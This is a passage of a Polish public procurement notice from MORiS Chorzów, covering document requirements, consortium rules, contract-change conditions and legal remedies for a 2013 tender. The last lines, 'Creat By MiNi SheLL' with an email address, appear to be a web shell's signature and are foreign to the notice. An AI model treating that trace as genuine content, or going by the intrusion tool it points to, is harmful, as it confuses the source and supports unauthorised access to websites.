3. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, zdolności finansowej, innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI pkt. A ust.1  pkt. 1, 2, 3, 5
4. Dokument pełnomocnictwa do reprezentowania podmiotów występujących wspólnie (konsorcjum, spółka cywilna, itp.) w postępowaniu o udzielenie zamówienia (załączyć jeżeli dotyczy).
5. Kopia dowodu wniesienia wadium.
6. zał. nr 7 do SIWZ  podwykonawcy ( złożyć wtedy, kiedy dotyczy)
7. zał. nr 8 do SIWZ- zaakceptowany wzór umowy  
8. Kosztorys ofertowy 
9. Przy zastosowaniu materiałów równoważnych - karty techniczne zastosowanych materiałów, deklaracje zgodności itp.
-Dokumenty wymienione w Rozdziale V i VI winny być przedstawione w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem.
-Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
-Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
-Zamawiający wykluczy Wykonawców, którzy nie złożą oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, z zastrzeżeniem postanowień art. 26 ust. 3 ustawy Pzp. 
-Zamawiający może wezwać na podstawie art. 26 ust. 4 ustawy Pzp, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp.
W przypadku złożenia oferty przez wykonawców występujących wspólnie, zgodnie z przepisem art. 23 ustawy - Prawo zamówień publicznych, w formularzu ofertowym należy zaznaczyć, że ofertę składa wykonawca występujący wspólnie/konsorcjum.
- Wymienić firmy występujące wspólnie/konsorcjum.
- Podać pełnomocnika upoważnionego do reprezentowania podmiotu występującego wspólnie/konsorcjum w postępowaniu.
-Wykonawcy występujący wspólnie/ konsorcjum ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
1.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie, dokumenty wymienione w rozdz. VI pkt. A ust. 1 muszą być złożone przez każdego uczestnika konsorcjum oddzielnie, zaś dokumenty wymienione w rozdz. VI pkt. B, C, D  Wykonawcy mogą złożyć łącznie. 

Przesłanki skutkujące wykluczeniem wykonawcy z postępowania, określone w art. 24 ust. 1 ustawy Pzp odnoszą się do każdego z członków konsorcjum oddzielnie. Oznacza to, że oświadczenie o niepodleganiu wykluczeniu z postępowania musi zostać złożone oddzielnie przez każdego z konsorcjantów lub przez pełnomocnika konsorcjum w imieniu każdego z konsorcjantów. 

Ponadto, Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić Pełnomocnika. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Jeżeli oferta Wykonawców  ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia umowy regulującej współpracę tych Wykonawców.

-Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takim przypadku Wykonawca zobowiązany jest udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  Istotne postanowienia umowne zawiera wzór umowy- załącznik nr 8 do SIWZ, stanowiący integralną część niniejszej siwz.
2) Zamawiający - na podstawie art. 144 ust. 1 ustawy  Pzp - Zakazuje sie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba ze zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu             o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
3) W szczególności zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
- 	wystąpienie warunków atmosferycznych i zdarzeń losowych, które istotnie utrudniają lub 	uniemożliwiają prowadzenie robót w umówiony sposób;
- 	konieczność zmiany osób pełniących samodzielne funkcje techniczne w budownictwie lub 	innych osób wyznaczonych do nadzorowania procesu budowlanego albo reprezentujących strony zgodnie z §3 ust.3 umowy. 
- 	zaistnienie konieczności wykonania robót zamiennych, korzystnych dla zamawiającego;
- 	wystąpienie konieczności wykonania robót dodatkowych, nie przewidzianych w dacie 	udzielenia zamówienia, od których zależy wykonanie przedmiotu zamówienia.
4) Dopuszczalny zakres zmian umowy w sprawie zamówienia publicznego obejmuje:
-	możliwość przedłużenia terminu wykonania zamówienia i innych terminów umownych;
-	możliwość zmiany osób uprawnionych do pełnienia samodzielnych funkcji technicznych w 	budownictwie lub innych osób wyznaczonych do nadzorowania procesu budowlanego;
- 	możliwość zmiany umówionego wynagrodzenia wynikającej z porównania rozmiaru i 	wartości robót zamiennych z robotami pierwotnie zamówionymi z zastrzeżeniem 	nieprzekraczalności ceny ofertowej, która będzie stanowić maksymalną graniczną kwotę 	umówionego wynagrodzenia;  
- 	modyfikację rozmiaru i rodzaju robót w zakresie ustalonych robót zamiennych, bez 	możliwości jednak rozszerzenia zakresu zamówienia w związku z zakazem wynikającym z 	art. 140 ust. 1 ustawy Pzp;
5) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.                   W takim przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
6). Dopuszcza się wszelkie zmiany umowy:
- 	wywołane przyczynami zewnętrznymi, które w sposób obiektywny uzasadniają potrzebę tej 	zmiany, niepowodująca zachwiania równowagi ekonomicznej pomiędzy wykonawcą a 	zamawiającym,
- 	w zakresie zmniejszenia określonego wynagrodzenia Wykonawcy oraz zasad płatności tego 	wynagrodzenia w przypadku zmniejszenia zakresu Przedmiotu Umowy. 
7). Dopuszcza się wszelkie nieistotne zmiany w treści umowy, które to zmiany nie wpłynęłyby na krąg wykonawców ubiegających się o udzielenie zamówienia ani na wynik postępowania.
8). Dopuszcza się zmiany wynagrodzenia brutto w przypadku zmiany stawki podatku VAT.

ROZDZIAŁ XX. Informacje dotyczące proponowanych podwykonawców

Zamawiający  dopuszcza korzystanie z usług podwykonawców. Zakres rzeczowy jaki Wykonawca zamierza zlecić podwykonawcom należy wykazać w zał. nr 7 do SIWZ (złożyć wtedy, kiedy dotyczy) na zasadach określonych w rozdziale XVI tekst pierwszy. 

ROZDZIAŁ XXI.  Pouczenie o środkach ochrony prawnej przysługujących Wykonawcom w toku postępowania o udzielenie zamówienia publicznego.
Wykonawcom, których interes prawny w uzyskaniu zamówienia doznał lub może doznać uszczerbku w wyniku naruszenia przez Zamawiającego przepisów ustawy, przepisów wykonawczych jak też postanowień niniejszej SIWZ przysługują środki ochrony prawnej przewidziane w Dziale VI (art. 179-198 ) ustawy Prawo zamówień publicznych. 
1. Zgodnie z art. 180 ustawy Prawo zamówień publicznych wykonawca może wnieść odwołanie wyłącznie od niezgodnej z przepisami ustawy czynności zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania czynności, do której zamawiający jest zobowiązany na podstawie ustawy.  
2. W przedmiotowym postępowaniu odwołanie przysługuje wyłącznie wobec czynności: 
- opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
- wykluczenia odwołującego z postępowania o udzielenie zamówienia
- odrzucenia oferty odwołującego 
3. Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
4. Odwołujący przesyła kopię odwołania zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. Domniemywa się, iż zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia, jeżeli przesłanie jego kopii nastąpiło przed upływem terminu do jego wniesienia za pomocą jednego ze sposobów określonych w art. 27 ust. 2 Pzp.
5. Wykonawca może w terminie przewidzianym do wniesienia odwołania poinformować zamawiającego o niezgodnej z przepisami ustawy czynności podjętej przez niego lub zaniechania czynności, do której jest on zobowiązany na podstawie ustawy, na które nie przysługuje odwołanie na podstawie art. 180 ust. 2.
6.	Na orzeczenie Izby stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do Sądu Okręgowego właściwego dla siedziby zamawiającego. Skargę wnosi się za pośrednictwem Prezesa Izby w terminie 7 dni od dnia doręczenia orzeczenia Izby przesyłając jednocześnie jej odpis przeciwnikowi skargi. Prezes Izby przekazuje skargę wraz z aktami sprawy do sądu w terminie 7 dni od jej otrzymania. Od wyroku sądu lub postanowienia kończącego postępowanie w sprawie  nie przysługuje skarga kasacyjna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.moris.chorzow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ wraz z załącznikami można pobrać ze strony internetowej:www.moris.chorzow.pl/bip, bądź  uzyskać od Zamawiającego w terminie 5 dni  za kwotę 30,- zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2013 godzina 09:00, miejsce: MORiS Chorzów, ul. Dąbrowskiego 113, 41-500 Chorzów, pok.335.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com